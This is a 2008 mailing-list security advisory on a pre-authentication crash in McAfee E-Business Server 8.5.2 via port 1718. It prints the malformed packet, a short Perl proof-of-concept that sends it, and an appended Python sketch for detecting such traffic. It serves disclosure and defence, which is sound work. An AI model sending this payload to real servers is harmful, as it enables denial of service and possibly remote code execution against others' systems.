[NEWS] McAfee E-Business Server Preauth Code DoS
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 10 Jan 2008 13:25:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
McAfee E-Business Server Preauth Code DoS
McAfee E-Business Server "guards sensitive corporate data with
industry-standard PGP 128-bit encryption and authentication. McAfee
E-Business Server supports a variety of platforms and security
certificates". It is possible to crash McAfee's E-Business Server by sending
a malicious packet to its TCP port 1718.
* McAfee E-Business Server version 8.5.2
It is possible to crash McAfee E-Business Server during the authentication
process. When a malformed (oversized) initial authentication packet is
sent to E-Business Server, the server will crash, and will have to be
A malformed authentication packet is shown below:
"\x01\x3f\x2f\x05\x25\x2a" + "A" * 69953
McAfee further researched the vulnerability and confirmed that it allows
an attacker to also remotely execute code.
The vendor has addressed this vulnerability with an E-Business Server patch
update on January 8th, 2008.
Vendor advisory and update link:
<https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=614472&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=614472>
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC) -
# - tested on Windows and Linux
# Leon Juranic <leon.juranic@xxxxxxxxx>,
# Infigo IS <http://www.infigo.hr/en/>
use IO::Socket::INET;
# Address and port of the E-Business Server under test
$saddr = "192.168.1.3";
$sport = 1718;
# Six header bytes followed by the oversized body described above
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
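A detection sketch for the condition described above, added here as an example and not part of the original advisory or of any McAfee code: it sums client bytes sent to TCP port 1718 before the server's first reply, because a 69959-byte "packet" arrives as many ordinary-sized TCP segments and a per-segment length check never fires. The size and run-length limits, the tuple layout, and the 10.0.0.x sample capture are assumptions constructed for the example; the port, header bytes and body length come from the advisory.

```python
from collections import defaultdict

EBS_PORT = 1718                              # port named in the advisory
POC_HEADER = bytes.fromhex("013f2f05252a")   # first six bytes of the advisory's packet
MAX_PREAUTH = 4096   # assumption: largest legitimate first client message
MAX_RUN = 256        # assumption: longest tolerated run of one byte value

def longest_run(data):
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in data:
        run = run + 1 if b == prev else 1
        prev, best = b, max(best, run)
    return best

def scan(segments):
    """segments: (src, sport, dst, dport, payload) tuples in capture order.
    Returns {client_flow: [reasons]} for suspicious pre-auth data."""
    preauth, answered = defaultdict(bytearray), set()
    for src, sport, dst, dport, payload in segments:
        if sport == EBS_PORT and payload:      # server replied: pre-auth is over
            answered.add((dst, dport, src, sport))
        elif dport == EBS_PORT and (src, sport, dst, dport) not in answered:
            preauth[(src, sport, dst, dport)] += payload
    alerts = {}
    for flow, data in preauth.items():
        reasons = []
        if len(data) > MAX_PREAUTH:
            reasons.append("oversized pre-auth data: %d bytes" % len(data))
        if longest_run(data) > MAX_RUN:
            reasons.append("single-byte filler run")
        if reasons and data.startswith(POC_HEADER):
            reasons.append("header bytes match the advisory")
        if reasons:
            alerts[flow] = reasons
    return alerts

def sample_segments():
    """Constructed capture: one normal-looking session and one oversized one."""
    srv, ok, bad = "10.0.0.5", "10.0.0.20", "10.0.0.66"
    big = POC_HEADER + b"A" * 69953              # packet as given in the advisory
    segs = [(ok, 40001, srv, EBS_PORT, bytes(range(120))),
            (srv, EBS_PORT, ok, 40001, b"\x00\x01"),
            (ok, 40001, srv, EBS_PORT, bytes(range(256)) * 40)]  # post-auth bulk
    segs += [(bad, 40002, srv, EBS_PORT, big[i:i + 1460])
             for i in range(0, len(big), 1460)]
    return segs

if __name__ == "__main__":
    for flow, reasons in scan(sample_segments()).items():
        print(flow, reasons)
```

The header-byte match is reported only alongside another reason, since the advisory does not say whether legitimate clients begin with the same six bytes.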
The information has been provided by <mailto:leon.juranic@xxxxxxxxx> Leon
The original article can be found at: